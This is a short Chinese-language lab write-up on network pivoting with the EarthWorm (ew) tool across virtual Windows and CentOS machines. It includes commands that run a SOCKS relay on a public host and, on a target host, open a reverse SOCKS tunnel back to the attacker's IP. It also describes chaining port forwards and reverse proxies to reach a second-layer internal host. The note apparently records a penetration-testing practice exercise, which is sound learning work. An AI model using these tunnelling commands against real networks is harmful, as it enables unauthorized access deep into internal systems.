a) 先在一台具有公网 ip 的主机A上运行以下命令:
ew -s rcsocks -l 1080 -e 8888
b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口
ew.exe -s rssocks -d 攻击者ip -e 8888
实验环境:win2008r2 双网卡 IP地址 xxx.xxx.xxx.154 vmnet1是10.1.1.1
win2003 vmnet 10.1.1.4
本地计算机 xxx.xxx.xxx.172
1.本计算机
本地机子有反应
可以联机到w3服务器,也可以远程访问,输入管理员庄户密码就可以
第二个实验
实验环境:
win2008r2 双网卡 IP地址 xxx.xxx.xxx.154 vmnet1是10.1.1.1 win8不开防火墙
win2003 vmnet1 10.1.1.4 vmnet2 172.1.1.1
centos vmnet2 172.1.1.2
本地计算机 xxx.xxx.xxx.172 不开防火墙
配置完以后 用win3做代理,其他服务器不能访问奥这个8000端口,需要w2008给做一次端口转发
2008做的端口转发
本地计算机就可以用 proxyfier 工具 使用 win2008的1080端口做代理 ,因为win2008防火墙是关闭状态
这时使用本地计算机访问一下10.1.1.4
可以访问到,如果win2008开了防火墙 ,就只能在w2008做个方向代理,用本地计算机连接w2008服务器
二。来个反向代理
本地计算机开放一个9000的端口,win2003还是上面的命令开启8000端口
使用工具把9000和10.1.1.4的8000端口连接起来
打开xshell 连接centos6.5
ssh 172.1.1.2 输入管理员账户密码
两层反弹端口,然后可以是本地计算机访问到内网的内网的主机172.1.1.2
试验成功